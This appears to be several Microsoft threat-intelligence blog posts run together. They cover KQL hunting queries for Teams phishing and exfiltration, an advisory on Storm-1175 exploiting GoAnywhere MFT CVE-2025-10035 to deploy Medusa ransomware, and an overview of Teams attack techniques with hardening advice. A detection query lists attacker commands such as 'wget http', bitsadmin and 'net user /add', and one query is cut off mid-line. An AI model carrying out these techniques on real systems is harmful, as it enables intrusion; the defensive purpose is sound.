Possible AiTM phishing attempt
Microsoft Defender for Identity
The following Microsoft Defender for Identity alerts can indicate associated threat activity:
Account enumeration reconnaissance
Suspicious additions to sensitive groups
Account Enumeration reconnaissance (LDAP)
Microsoft Defender for Cloud Apps
The following alerts might indicate threat activity associated with this threat.
Consent granted to application with Microsoft Teams permissions
Risky user installed a suspicious application in Microsoft Teams
Compromised account signed in to Microsoft Teams
Microsoft Teams chat initiated by a suspicious external user
Suspicious Teams access via Graph API
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Possible mail exfiltration by app
Microsoft Security Copilot
Microsoft Security Copilot customers can use the Copilot in Defender embedded experience to check the impact of this report and get insights based on their environment’s highest exposure level in Threat analytics, Intel profiles, Intel Explorer and Intel projects pages of the Defender portal.
You can also use Copilot in Defender to speed up analysis of suspicious scripts and command lines by inspecting them below the incident graph on an incident page and in the timeline on the Device entity page without using external tools.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Advanced hunting allows you to view and query all the data sources available within the unified Microsoft Defender portal, which include Microsoft Defender XDR and various Microsoft security services.
After onboarding to the Microsoft Sentinel data lake, auxiliary log tables are no longer available in Microsoft Defender advanced hunting. Instead, you can access them through data lake exploration Kusto Query Language (KQL) queries in the Defender portal. For more information, see KQL queries in the Microsoft Sentinel data lake.
You can design and tweak custom detection rules using the advanced hunting queries and set them to run at regular intervals, generating alerts and taking response actions whenever there are matches. You can also link the generated alert to this report so that it appears in the Related incidents tab in threat analytics. Custom detection rule can automatically take actions on devices, files, users, or emails that are returned by the query. To make sure you’re creating detections that trigger true alerts, take time to review your existing custom detections by following the steps in Manage existing custom detection rules.
Detect potential data exfiltration from Teams
let timeWindow = 1h;
let messageThreshold = 20;
let trustedDomains = dynamic(["trustedpartner.com", "anothertrusted.com"]);
CloudAppEvents
| where Timestamp > ago(1d)
| where ActionType == "MessageSent"
| where Application == "Microsoft Teams"
| where isnotempty(AccountObjectId)
| where tostring(parse_json(RawEventData).ParticipantInfo.HasForeignTenantUsers) == "true"
| where tostring(parse_json(RawEventData).CommunicationType) in ("OneOnOne", "GroupChat")
| extend RecipientDomain = tostring(parse_json(RawEventData).ParticipantInfo.ParticipatingDomains[1])
| where RecipientDomain !in (trustedDomains)
| extend SenderUPN = tostring(parse_json(RawEventData).UserId)
| summarize MessageCount = count() by bin(Timestamp, timeWindow), SenderUPN, RecipientDomain
| where MessageCount > messageThreshold
| project Timestamp, MessageCount, SenderUPN, RecipientDomain
| sort by MessageCount desc
Detect mail bombing that sometimes precedes technical support scams on Microsoft Teams
EmailEvents
| where Timestamp > ago(1d)
| where DetectionMethods contains "Mail bombing"
| project Timestamp, NetworkMessageId, SenderFromAddress, Subject, ReportId
Detect malicious Teams content from MessageEvents
MessageEvents
| where Timestamp > ago(1d)
| where ThreatTypes has "Phish"
or ThreatTypes has "Malware"
or ThreatTypes has "Spam"
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType, IsExternalThread, ReportId
Detect communication with external help desk/support representatives
MessageEvents
| where Timestamp > ago(5d)
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
or (SenderDisplayName contains "help" and SenderDisplayName contains "desk")
or (SenderDisplayName contains "it" and SenderDisplayName contains "support")
or (SenderDisplayName contains "working" and SenderDisplayName contains "home")
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType
Expand detection of communication with external help desk/support representatives by searching for linked process executions
let portableExecutable = pack_array("binary.exe", "portable.exe");
let timeAgo = ago(30d);
MessageEvents
| where Timestamp > timeAgo
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
| summarize spamEvent = min(Timestamp) by SenderEmailAddress
| join kind=inner (
DeviceProcessEvents
| where Timestamp > timeAgo
| where FileName in (portableExecutable)
) on $left.SenderEmailAddress == $right.InitiatingProcessAccountUpn
| where spamEvent
Surface Teams threat activity using Microsoft Security Copilot
Microsoft Security Copilot in Microsoft Defender comes with a query assistant capability in advanced hunting. You can also run the following prompt in Microsoft Security Copilot pane in the Advanced hunting page or by reopening Copilot from the top of the query editor:
Show me recent activity in the last 7 days that matches attack techniques described in the Microsoft Teams technique profile. Include relevant alerts, affected users and devices, and generate advanced hunting queries to investigate further.
Microsoft Sentinel
Possible Teams phishing activity
This query specifically monitors Microsoft Teams for one-on-one chats involving impersonated users (e.g., 'Help Desk', 'Microsoft Security').
let suspiciousUpns = DeviceProcessEvents
| where DeviceId == "alertedMachine"
| where isnotempty(InitiatingProcessAccountUpn)
| project InitiatingProcessAccountUpn;
CloudAppEvents
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where isempty(AccountObjectId)
| where RawEventData.ParticipantInfo.HasForeignTenantUsers == true
| where RawEventData.CommunicationType == "OneonOne"
| where RawEventData.ParticipantInfo.HasGuestUsers == false
| where RawEventData.ParticipantInfo.HasOtherGuestUsers == false
| where RawEventData.Members[0].DisplayName in ("Microsoft Security", "Help Desk", "Help Desk Team", "Help Desk IT", "Microsoft Security", "office")
| where AccountId has "@"
| extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))
| where TargetUPN in (suspiciousUpns)
Files uploaded to Teams and access summary
This query identifies files uploaded to Microsoft Teams chat files and their access history, specifically mentioning operations from SharePoint. It allows tracking of potential file collection activity through Teams-related storage.
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileUploaded"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
| join kind= leftouter (
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileDownloaded" or Operation =~ "FileAccessed"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
) on OfficeObjectId
| extend userBag = bag_pack(UserId1, ClientIP1)
| summarize make_set(UserId1, 10000), make_bag(userBag, 10000) by TimeGenerated, UserId, OfficeObjectId, SourceFileName
| extend NumberUsers = array_length(bag_keys(bag_userBag))
| project timestamp=TimeGenerated, UserId, FileLocation=OfficeObjectId, FileName=SourceFileName, AccessedBy=bag_userBag, NumberOfUsersAccessed=NumberUsers
| extend AccountName = tostring(split(UserId, "@")[0]), AccountUPNSuffix = tostring(split(UserId, "@")[1])
| extend Account_0_Name = AccountName
| extend Account_0_UPNSuffix = AccountUPNSuffix
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
On September 18, 2025, Fortra published a security advisory regarding a critical deserialization vulnerability in GoAnywhere MFT’s License Servlet, which is tracked as CVE-2025-10035 and has a CVSS score of 10.0. The vulnerability could allow a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection and potential remote code execution (RCE). A cybercriminal group tracked by Microsoft Threat Intelligence as Storm-1175, known for deploying Medusa ransomware and exploiting public-facing applications for initial access, was observed exploiting the vulnerability.
Microsoft urges customers to upgrade to the latest version following Fortra’s recommendations. We are publishing this blog post to increase awareness of this threat and to share end-to-end protection coverage details across Microsoft Defender, as well as security posture hardening recommendations for customers.
Vulnerability analysis
The vulnerability, tracked as CVE-2025-10035, is a critical deserialization flaw impacting GoAnywhere MFT’s License Servlet Admin Console versions up to 7.8.3. It enables an attacker to bypass signature verification by crafting a forged license response signature, which then allows the deserialization of arbitrary, attacker-controlled objects.
Successful exploitation could result in command injection and potential RCE on the affected system. Public reports indicate that exploitation does not require authentication if the attacker can craft or intercept valid license responses, making this vulnerability particularly dangerous for internet-exposed instances.
The impact of CVE-2025-10035 is amplified by the fact that, upon successful exploitation, attackers could perform system and user discovery, maintain long-term access, and deploy additional tools for lateral movement and malware. Public advisories recommend immediate patching, reviewing license verification mechanisms, and closely monitoring for suspicious activity in GoAnywhere MFT environments to mitigate risks associated with this vulnerability.
Exploitation activity by Storm-1175
Microsoft Defender researchers identified exploitation activity in multiple organizations aligned to tactics, techniques, and procedures (TTPs) attributed to Storm-1175. Related activity was observed on September 11, 2025.
An analysis of the threat actor’s TTPs reveals a multi-stage attack. For initial access, the threat actor exploited the then-zero-day deserialization vulnerability in GoAnywhere MFT. To maintain persistence, they abused remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent. They dropped the RMM binaries directly under the GoAnywhere MFT process. In addition to these RMM payloads, the creation of .jsp files within the GoAnywhere MFT directories was observed, often at the same time as the dropped RMM tools.
The threat actor then executed user and system discovery commands and deployed tools like netscan for network discovery. Lateral movement was achieved using mstsc.exe, allowing the threat actor to move across systems within the compromised network.
For command and control (C2), the threat actor utilized RMM tools to establish their infrastructure and even set up a Cloudflare tunnel for secure C2 communication. During the exfiltration stage, the deployment and execution of Rclone was observed in at least one victim environment. Ultimately, in one compromised environment, the successful deployment of Medusa ransomware was observed.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of this threat.
Upgrade to the latest version following Fortra’s recommendations. Note that upgrading does not address previous exploitation activity, and review of the impacted system may be required.
Use an enterprise attack surface management product, like Microsoft Defender External Attack Surface Management (Defender EASM), to discover unpatched systems on your perimeter.
Check your perimeter firewall and proxy to ensure servers are restricted from accessing the internet for arbitrary connections, like browsing and downloads. Such restrictions help inhibit malware downloads and command-and-control activity.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on block mode in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks. Attack surface reduction rules are sweeping settings that are effective at stopping entire classes of threats:
Following the release of the vulnerability, the Microsoft Defender Research Team ensured that protections are deployed for customers, from ensuring that Microsoft Defender Vulnerability Management correctly identifies and surfaces all vulnerable devices in impacted customer environments, to building Microsoft Defender for Endpoint detections and alerting along the attack chain.
Microsoft Defender Vulnerability Management customers can search for this vulnerability in the Defender Portal or navigate directly to the CVE page to view a detailed list of the exposed devices within their organization.
Customers of Microsoft Defender Experts for XDR that might have been impacted have also been notified of any post-exploitation activity and recommended actions.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
Exploitation of GoAnywhere MFT via deserialization in Licensing Service
Microsoft Defender for Endpoint detects possible exploitation via the following alert: – Possible exploitation of GoAnywhere MFT vulnerability
Microsoft Defender Experts for XDR can detect possible exploitation via the following alerts: – Possible exploitation of vulnerability in GoAnywhere Tomcat – Possible discovery activity following successful Tomcat vulnerability exploitation
Microsoft Defender Vulnerability Management(MDVM) surfaces devices vulnerable to CVE-2025-10035.
Microsoft Defender External Attack Surface Management Attack Surface Insights with the following title can indicate vulnerable devices on your network but is not necessarily indicative of exploitation: – [Potential] CVE-2025-10035 – GoAnywhere MFT Command Injection via Deserialization in Licensing Service
(Note: An Attack Surface Insight marked as potential indicates a service is running but cannot validate whether that service is running a vulnerable version. Check resources to verify that they are up to date.)
Persistence
Dropping and abuse of remote monitoring and management (RMM) tool and suspected web shell deployment; creation of .jsp files within the GoAnywhere MFT directories
Microsoft Defender for Endpoint detects possible signs of the attacker deploying persistence mechanisms via the following alerts: – Uncommon remote access software – Remote access software – Suspicious file dropped and launched – Suspicious service launched – Suspicious account creation – User account created under suspicious circumstances – New local admin added using Net commands – New group added suspiciously – Suspicious Windows account manipulation – Ransomware-linked threat actor detected
Discovery
User and system discovery commands; deployment of tools such as netscan for network discovery
Microsoft Defender for Endpoint detects malicious exploration activities via the following alerts: – Suspicious sequence of exploration activities – Anomalous account lookups – Suspicious Windows account manipulation
Command and control
Use of RMM tools for establishing C2 infrastructure and setup of Cloudflare tunnel for secure C2 communication
Microsoft Defender for Endpoint detects C2 activities observed in this campaign via the following alerts: – Uncommon remote access software – Remote access software
Exfiltration
Rclone deployment and execution
Microsoft Defender for Endpoint detects exfiltration activities observed in this campaign via the following alert: – Ransomware-linked threat actor detected
Actions on objectives
Deployment of Medusa ransomware
Microsoft Defender Antivirus detects the ransomware payload used in this attack as the following threat: – Ransom:Win32/Medusa
Microsoft Defender for Endpoint detects the ransomware payload via the following alerts: – Ransomware-linked threat actor detected
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Vulnerable devices
Find devices affected by the CVE-2025-10035 vulnerability.
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-10035")
| summarize by DeviceName, CveId
Possible GoAnywhere MFT exploitation
Look for suspicious PowerShell commands indicative of GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
Look for suspicious cmd.exe commands launched after possible GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
DeviceProcessEvents
| where InitiatingProcessFolderPath contains @"\GoAnywhere\"
| where InitiatingProcessFileName contains "tomcat"
| where InitiatingProcessCommandLine endswith "//RS//GoAnywhere"
| where ProcessCommandLine !contains @"\GIT\"
| where FileName == "cmd.exe"
| where ProcessCommandLine has_any ("powershell.exe", "powershell ", "rundll32.exe", "rundll32 ", "bitsadmin.exe", "bitsadmin ", "wget http", "quser") or ProcessCommandLine has_all ("nltest", "/dclist") or ProcessCommandLine has_all ("nltest", "/domain_trusts") or ProcessCommandLine has_all ("net", "user ", "/add") or ProcessCommandLine has_all ("net", "user ", " /domain") or ProcessCommandLine has_all ("net", " group", "/domain")
Storm-1175 indicators of compromise
The following query identifies known post-compromise tools leveraged in recent GoAnywhere exploitation activity attributed to Storm-1175. Note that the alert Ransomware-linked threat actor detected will detect these hashes.
let fileHashes = dynamic(["4106c35ff46bb6f2f4a42d63a2b8a619f1e1df72414122ddf6fd1b1a644b3220", "c7e2632702d0e22598b90ea226d3cde4830455d9232bd8b33ebcb13827e99bc3", "cd5aa589873d777c6e919c4438afe8bceccad6bbe57739e2ccb70b39aee1e8b3", "5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19"]);
union
(
DeviceFileEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"
),
(
DeviceEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"
),
(
DeviceImageLoadEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"
),
(
DeviceProcessEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents"
)
| order by Timestamp desc
Indicators of compromise
File IoCs (RMM tools in identified Storm-1175 exploitation activity):
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
The extensive collaboration features and global adoption of Microsoft Teams make it a high-value target for both cybercriminals and state-sponsored actors. Threat actors abuse its core capabilities – messaging (chat), calls and meetings, and video-based screen-sharing – at different points along the attack chain. This raises the stakes for defenders to proactively monitor, detect, and respond.
While under Microsoft’s Secure Future Initiative (SFI), default security has been strengthened by design, defenders still need to make the most out of customer-facing security capabilities. Therefore, this blog recommends countermeasures and controls across identity, endpoints, data apps, and network layers to help harden enterprise Teams environments. To frame these defenses, we first examine relevant stages of the attack chain. This guidance complements, but doesn’t repeat, the guidance built into the Microsoft Security Development Lifecycle (SDL) as outlined in the Teams Security Guide; we will instead focus on guidance for disrupting adversarial objectives based on the relatively recently observed attempts to exploit Teams infrastructure and capabilities.
Attack chain
Figure 1. Attack techniques that abuse Teams along the attack chain
Reconnaissance
Every Teams user account is backed by a Microsoft Entra ID identity. Each team member is an Entra ID object, and a team is a collection of channel objects. Teams may be configured for the cloud or a hybrid environment and supports multi-tenant organizations (MTO) and cross-tenant communication and collaboration. There are anonymous participants, guests, and external access users. From an API perspective, Teams is an object type that can be queried and stored in a local database for reconnaissance by enumerating directory objects, and mapping relationships and privileges. For example, federation tenant configuration indicates whether the tenant allows external communication and can be inferred from the API response queries reflecting the effective tenant federation policy.
While not unique to Teams, there are open-source frameworks that can specifically be leveraged to enumerate less secure users, groups, and tenants in Teams (mostly by repurposing the Microsoft Graph API or gathering DNS), including ROADtools, TeamFiltration, TeamsEnum, and MSFT-Recon-RS. These tools facilitate enumerating teams, members of teams and channels, tenant IDs and enabled domains, as well as permissiveness for communicating with external organizations and other properties, like presence. Presence indicates a user’s current availability and status outside the organization if Privacy mode is not enabled, which could then be exploited if the admin has not disabled external meetings and chat with people and organizations outside the organization (or at least limited it to specified external domains).
Many open-source tools are modular Python packages including reusable libraries and classes that can be directly imported or extended to support custom classes, meaning they are also interoperable with other custom open-source reconnaissance and discovery frameworks designed to identify potential misconfigurations.
Resource development
Microsoft continuously enhances protections against fraudulent Microsoft Entra ID Workforce tenants and the abuse of free tenants and trial subscriptions. As these defenses grow stronger, threat actors are forced to invest significantly more resources in their attempts to impersonate trusted users, demonstrating the effectiveness of our layered security approach. . This includes threat actors trying to compromise weakly configured legitimate tenants, or even actually purchasing legitimate ones if they have confidence they could ultimately profit. It should come as no surprise that if they can build a persona for social engineering, they will take advantage of the same resources as legitimate organizations, including custom domains and branding, especially if it can lend credibility to impersonating internal help desk, admin, or IT support, which could then be used as a convincing pretext to compromise targets through chat messaging and phone calls. Sophisticated threat actors try to use the very same resources used by trustworthy organizations, such as acquiring multiple tenants for staging development or running separate operations across regions, and using everyday Teams features like scheduling private meetings through chat, and audio, video and screen-sharing capabilities for productivity.
Initial access
Tech support scams remain a generally popular pretext for delivery of malicious remote monitoring and management (RMM) tools and information-stealing malware, leading to credential theft, extortion, and ransomware. There are always new variants to bypass security awareness defenses, such as the rise in email bombing to create a sense of stress and urgency to restore normalcy. In 2024, for instance, Storm-1811 impersonated tech support, claiming to be addressing junk email issues that it had initiated. They used RMM tools to deliver the ReedBed malware loader of ransomware payloads and remote command execution. Meanwhile, Midnight Blizard has successfully impersonated security and technical support teams to get targets to verify their identities under the pretext of protecting their accounts by entering authentication codes that complete the authentication flow for breaking into the accounts.
Similarly in May, Sophos identified a 3AM ransomware (believed to be a rebranding of BlackSuit) affiliate adopting techniques from Storm-1811, including flooding employees with unwanted emails followed by voice and video calls on Teams impersonating help desk personnel, claiming they needed remote access to stop the flood of junk emails. The threat actor reportedly spoofed the IT organization’s phone number.
With threat actors leveraging deepfakes, perceived authority helps make this kind of social engineering even more effective. Threat actors seeking to spoof automated workflow notifications and interactions can naturally extend to spoofing legitimate bots and agents as they gain more traction, as threat actors are turning to language models to facilitate their objectives.
Prevalent threat actors associated with ransomware campaigns, including the access broker tracked as Storm-1674 have used sophisticated red teaming tools, like TeamsPhisher, to distribute DarkGate malware and other malicious payloads over Teams. In December 2024, for example, Trend Micro reported an incident in which a threat actor impersonated a client during a Teams call to persuade a target to install AnyDesk. Remote access was reportedly then used also to deploy DarkGate. Threat actors may also just use Teams to gain initial access through drive-by-compromise activity to direct users to malicious websites.
Widely available admin tools, including AADInternals, could be leveraged to deliver malicious links and payloads directly into Teams. Teams branding (like any communications brand asset) makes for effective bait, and has been used by adversary-in-the-middle (AiTM) actors like Storm-00485. Threat actors could place malicious advertisements in search results for a spoofed app like Teams to misdirect users to a download site hosting credential-stealing malware. In July 2025, for instance, Malwarebytes reported observing a malvertising campaign delivering credential-stealing malware through a fake Microsoft Teams for Mac installer.
Whether it is a core app that is part of Teams, an app created by Microsoft, a partner app validated by Microsoft, or a custom app created by your own organization—no matter how secure an app—they could still be spoofed to gain a foothold in a network. And similar to leveraging a trusted brand like Teams, threat actors will also continue to try and take advantage of trusted relationships as well to gain Teams access, whether leveraging an account with access or abusing delegated administrator relationships to reach a target environment.
Persistence
Threat actors employ a variety of persistence techniques to maintain access to target systems—even after defenders attempt to regain control. These methods include abusing shortcuts in the Startup folder to execute malicious tools, or exploiting accessibility features like Sticky Keys (as seen in this ransomware case study). Threat actors could try to create guest users in target tenants or add their own credentials to a Teams account to maintain access.
Part of the reason device code phishing has been used to access target accounts is that it could enable persistent access for as long as the tokens remain valid. In February, Microsoft reported that Storm-2372 had been capturing authentication tokens by exploiting device code authentication flows, partially by masquerading as Microsoft Teams meeting invitations and initiating Teams chats to build rapport, so that when the targets were prompted to authenticate, they would use Storm-2372-generated device codes, enabling Storm-2372 to steal the authenticated sessions from the valid access tokens.
Teams phishing lures themselves can sometimes be a disguised attempt to help threat actors maintain persistence. For example, in July 2025, the financially motivated Storm-0324 most likely relied on TeamsPhisher to send Teams phishing lures to deliver a custom malware JSSloader for the ransomware operator Sangria Tempest to use as an access vector to maintain a foothold.
Execution
Apart from admin accounts, which are an attractive target because they come with elevated privileges, threat actors try and trick everyday Teams users into clicking links or opening files that lead to malicious code execution, just like through email.
Privilege escalation
If threat actors successfully compromise accounts or register actor-controlled devices, they often times try to change permission groups to escalate privileges.If a threat actor successfully compromises a Teams admin role, this could lead to abuse of the permissions to use the admin tools that belong to that role.
Credential access
With a valid refresh token, actors can impersonate users through Teams APIs. There is no shortage of administrator tools that can be maliciously repurposed, such as AADInternals, to intercept access to tokens with custom phishing flows. Tools like TeamFiltration could be leveraged just like for any other Microsoft 365 service for targeting Teams. If credentials are compromised through password spraying, threat actors use tools like this to request OAuth tokens for Teams and other services. Threat actors continue to try and bypass multifactor authentication (MFA) by repeatedly generating authentication prompts until someone accepts by mistake, and try to compromise MFA by adding alternate phone numbers or intercepting SMS-based codes.
For instance, the financially motivated threat actor Octo Tempest uses aggressive social engineering, including over Teams, to take control of MFA for privileged accounts. They consistently socially engineer help desk personnel, targeting federated identity providers using tools like AADInternals to federate existing domains, or spoof legitimate domains by adding and then federating new domains to forge tokens.
Discovery
To refine targeting, threat actors analyze Teams configuration data from API responses, enumerate Teams apps if they obtain unauthorized access, and search for valuable files and directories by leveraging toolkits for contextualizing potential attack paths. For instance, Void Blizzard has used AzureHound to enumerate a compromised organization’s Microsoft Entra ID configuration and gather details on users, roles, groups, applications, and devices. In a small number of compromises, the threat actor accessed Teams conversations and messages through the web client. AADInternals can also be used to discover Teams group structures and permissions.
The state-sponsored actor Peach Sandstorm has delivered malicious ZIP files through Teams, then used AD Explorer to take snapshots of on-premises Active Directory database and related files.
Lateral movement
A threat actor that manages to obtain Teams admin access (whether directly or indirectly by purchasing an admin account through a rogue online marketplace) could potentially leverage external communication settings and enable trust relationships between organizations to move laterally. In late 2024, in a campaign dubbed VEILdriveby Hunters’ Team AXON, the financially motivated cybercriminal threat actors Sangria Tempest and Storm-1674 used previously compromised accounts to impersonate IT personnel and convince a user in another organization through Teams to accept a chat request and grant access through a remote connection.
Collection
Threat actors often target Teams to try and collect information from it that could help them to accomplish their objectives, such as to discover collaboration channels or high-privileged accounts. They could try to mine Teams for any information perceived as useful in furtherance of their objectives, including pivoting from a compromised account to data accessible to that user from OneDrive or SharePoint. AADInternals can be used to collect sensitive chat data and user profiles. Post-compromise, GraphRunner can leverage the Microsoft Graph API to search all chats and channels and export Teams conversations.
Command and control
Threat actors attempt to deliver malware through file attachments in Teams chats or channels. A cracked version of Brute Ratel C4 (BRc4) includes features to establish C2 channels with platforms like Microsoft Teams by using their communications protocols to send and receive commands and data.
Post-compromise, threat actors can use red teaming tool ConvoC2 to send commands through Microsoft Teams messages using the Adaptive Card framework to embed data in hidden span tags and then exfiltrate using webhooks. But threat actors can also use legitimate remote access tools to try and establish interactive C2 through Teams.
Exfiltration
Threat actors may use Teams messages or shared links to direct data exfiltration to cloud storage under their control. Tools like TeamFiltration include an exfiltration module that rely on a valid access token to then extract recent contacts and download chats and files through OneDrive or SharePoint.
Impact
Threat actors try to use Teams messages to support financial theft through extortion, social engineering, or technical means.
Octo Tempest has used communication apps, including Teams to send taunting and threatening messages to organizations, defenders, and incident response teams as part of extortion and ransomware payment pressure tactics. After gaining control of MFA through social engineering password resets, they sign in to Teams to identify sensitive information supporting their financially motivated operations.
Configure just-in-time access to privileged roles. Use Microsoft Entra Privileged Identity Management (PIM) (preview) to provide as-needed and just-in-time access to Microsoft 365 roles to reduce standing privileges and limit exposure.
Harden endpoint security
Use configuration analyzer to strengthen security posture. Identify and remediate security policies that are less secure than the Standard or Strict protection profiles in preset security policies.
Keep Teams clients, browsers, OS, and dependencies updated.
Enable cloud-delivered protection in Defender Antivirus. Cloud-delivered protection enables sharing detection status between Microsoft 365 and Defender for Endpoint. Real-time protection blocking, including on-access scanning, is not availablewhen Defender Antivirus is running only in passive mode. You can turn on endpoint detection and response (EDR) in block mode even if Defender Antivirus isn’t your primary antivirus solution. EDR in block mode detects and remediates malicious items on the device post-breach.
Protect security settings from being disabled or changed with tamper protection.
If your organization utilizes another remote support tool such as Remote Help, disable or remove Quick Assist as a best practice, if it isn’t used within your environment.
Understand and use attack surface reduction capabilities in your environment to prevent common techniques used in combination with Teams threat activity as part of your first line of defense.
Manage call settings in Teams. Inbound calls originating from the Public Switched Telephone Network (PSTN) on a tenant global level can be blocked.
Use meeting and event policies to control the features that are available to organizers and participants.
Use the Teams admin center or PowerShell to require anonymous users and people from untrusted organizations to complete a verification check before joining the meeting.
Manage who can present and request control to generally prevent external users by default without business justification from being able to automatically request control over a shared window or screen.
Specify which types of external meetings and chat to allow and which users should have access to these features. You can change the default setting to limit external access to only allowed domains or block specific domains and subdomains. By blocking external communication with trial-only tenants, users that do not have any purchased seats are not able to search and contact your users via chat, Teams calls, and meetings.
You can prevent users that are not managed by an organization from starting conversations or prevent chat with them. If you choose to allow anonymous users in your environment, you can verify their identities by email code to join meetings (Premium).
Monitor Teams activities using activity policies in Defender for Cloud Apps. If external users are enabled, you can monitor their presence. Defender for Cloud Apps integrates directly with Microsoft 365 audit logs. Office 365 Cloud Apps Security has access to the features of Defender for Cloud Apps to support the Office 365 app connector.
Specify which users and groups can use Microsoft Teams apps or a copilot agent and control it on a per-app basis. You can change the default setting letting users install apps by default. Evaluate the compliance, security, and data handling information of an app and also understand the permissions requested by the app before you allow an app to be used.
Teams data is encrypted in transit and at rest in Microsoft services, between services, and between clients and services. For heightened confidentiality, you can also use end-to-end encryption in advanced meeting protection that is available with the Teams Premium add-on license. This encrypts audio, video, and video-based screen sharing at its origin and decrypts it at its destination.
Get started using attack simulation training. The Teams attack simulation training is currently in private preview. Build organizational resilience by raising awareness of QR code phishing, deepfakes including voice, and about protecting your organization from tech support and ClickFix scams.
Train developers to follow best practices when working with the Microsoft Graph API. Apply these practices when detecting, defending against, and responding to malicious techniques targeting Teams.
Learn more about some of the frequent initial access threats impacting SharePoint servers. SharePoint is a front end for Microsoft Teams and an attractive target.
Configure detection and response
Verify the auditing status of your organization in Microsoft Purview to make sure you can investigate incidents. In Threat Explorer, Content malware includes files detected by Safe Attachments for Teams, and URL clicks include all user clicks in Teams.
If user reporting of messages is turned on in the Teams admin center, it also needs to be turned on in the Defender portal. We encourage you to submit user reported Teams messages to Microsoft here.
Refer to the table listing the Microsoft Teams activities logged in the Microsoft 365 audit log. With the Office 365 Management Activity API, you can retrieve information about user, admin, system, and policy actions and events including from Entra activity logs.
Familiarize yourself with relevant advanced hunting schema and available tables.
Advanced hunting supports guided and advanced modes. You can use the advanced hunting queries in the advanced hunting section to hunt with these tables for Teams-related threats.
Several tables covering Teams-related threats are available in preview and populated by Defender for Office 365, including MessageEvents, MessagePostDeliveryEvents, MessageUrlInfo, and UrlClickEvents. These tables provide visibility into ZAP events and URLs in Teams messages, including allowed or blocked URL clicks in Teams clients. You can join these tables with others to gain more comprehensive insight into the progression of the attack chain and end-to-end threat activity.
Connect Microsoft 365 to Microsoft Defender for Cloud Apps.
